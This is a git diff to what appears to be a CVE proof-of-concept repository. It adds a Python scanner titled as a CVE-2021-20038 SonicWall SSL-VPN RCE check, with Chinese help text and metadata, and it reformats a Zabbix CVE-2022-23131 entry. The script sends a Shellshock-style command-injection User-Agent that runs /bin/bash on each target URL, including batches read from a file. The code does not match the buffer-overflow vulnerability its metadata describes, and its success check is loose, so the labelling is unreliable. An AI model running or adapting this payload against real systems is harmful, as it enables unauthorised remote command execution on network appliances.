diff --git a/cve/apache/2021/CVE-2021-20038/CVE-2021-20038.py b/cve/apache/2021/CVE-2021-20038/CVE-2021-20038.py new file mode 100644 index 0000000000000000000000000000000000000000..158cde4a1feb893fc5db6c875ad65aebaa03a0bb --- /dev/null +++ b/cve/apache/2021/CVE-2021-20038/CVE-2021-20038.py @@ -0,0 +1,68 @@ +import requests +import urllib3 +import sys +from urllib import parse + + +requests.packages.urllib3.disable_warnings() + +def banner(): + print('baby test') + +def help(): + print(' SonicWall RCE -h 查看帮助 ') + print(' SonicWall RCE -u 输入待检测url ') + print(' SonicWall RCE -f 输入待检测文件 ') + +def poc(url): + path="/cgi-bin/jarrewrite.sh" + vulnurl=url + path + #print(vulnurl) + headers = { + "User-Agent": "() { :; }; echo ; /bin/bash -c id", +} + try: + res=requests.get(vulnurl,headers=headers,verify=False,timeout=5) + if "id" in res.text and res.status_code==200: + print(res.text+url+"is vuln 漏洞存在") + else: + print(url+"is not vuln 漏洞不存在") + except Exception as e: + print(e) + +def poc1(files): + for url in open(files): + url=url.strip() + path="/cgi-bin/jarrewrite.sh" + vulnurl=url + path + #print(vulnurl) + headers = { + "User-Agent": "() { :; }; echo ; /bin/bash -c id", + } + try: + res=requests.get(vulnurl,headers=headers,verify=False,timeout=5) + if "id" in res.text and res.status_code==200: + print("[*] "+res.text+url+"is vuln 漏洞存在") + else: + print("[*] "+url+"is not vuln 漏洞不存在") + except Exception as e: + print(e) + +if __name__ == '__main__': + try: + banner() + print('by baby') + cmd1=sys.argv[1] + + if cmd1=='-h': + help() + elif cmd1=='-u': + cmd2=sys.argv[2] + poc(cmd2) + elif cmd1=='-f': + cmd2=sys.argv[2] + poc1(cmd2) + else: + print("请输入正确参数,或者-h查看帮助") + except: + print("输入-h查看帮助") \ No newline at end of file diff --git a/cve/apache/2021/CVE-2021-20038/README.md b/cve/apache/2021/CVE-2021-20038/README.md new file mode 100644 index 0000000000000000000000000000000000000000..8e3778dff37e6f1a8a91a54bb4f8b20d63e1cf23 --- /dev/null +++ b/cve/apache/2021/CVE-2021-20038/README.md @@ -0,0 +1,9 @@ +# SonicWallSSL-VPN_RCE +CVE-2021-20038 + +命令行传参 +-h 查看帮助 +-u 指定url +-f 指定file文件 + +file内部的格式需添加http/https头 diff --git a/cve/apache/2021/yaml/CVE-2021-20038.yaml b/cve/apache/2021/yaml/CVE-2021-20038.yaml new file mode 100644 index 0000000000000000000000000000000000000000..4487857677758b85e49026069db15d0b76f0dc38 --- /dev/null +++ b/cve/apache/2021/yaml/CVE-2021-20038.yaml @@ -0,0 +1,19 @@ +id: CVE-2021-20038 +source: https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE +info: + name: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables. + severity: critical + description: | + A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions. + scope-of-influence: + SMA 200, 210, 400, 410 and 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20038#match-7894400 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-20038 + cwe-id: CWE-787, CWE-121 + cnvd-id: None + kve-id: None + tags: cve2021,Apache,RCE \ No newline at end of file diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml similarity index 98% rename from cve/zabbix/2022/yaml/CVE-2022-23131.yaml rename to cve/zabbix/2022/yaml/CVE-2022-23131.yaml index 0eab256c4dfe862200d680cff85dda2a1537ef4e..e3f384c6c24d7dba5f7d0ef6e46f8b0a2f653a79 100644 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml @@ -1,20 +1,20 @@ -id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 -info: - name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 - severity: critical - description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 - scope-of-influence: - Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://www.secpulse.com/archives/179601.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23131 - cwe-id: CWE-290 - cnvd-id: None - kve-id: None +id: CVE-2022-23131 +source: + https://github.com/L0ading-x/cve-2022-23131 +info: + name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 + severity: critical + description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 + scope-of-influence: + Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 + - https://www.secpulse.com/archives/179601.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23131 + cwe-id: CWE-290 + cnvd-id: None + kve-id: None tags: 前端认证绕过漏洞 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7128c8a654f0511f8b057f1d715266e718f048c2..6ae5af394cefc594e6312c08ecbaf0ea2405704e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,6 +4,7 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 + - CVE-2021-20038 apache-APISIX: - CVE-2022-24112 - CVE-2021-45232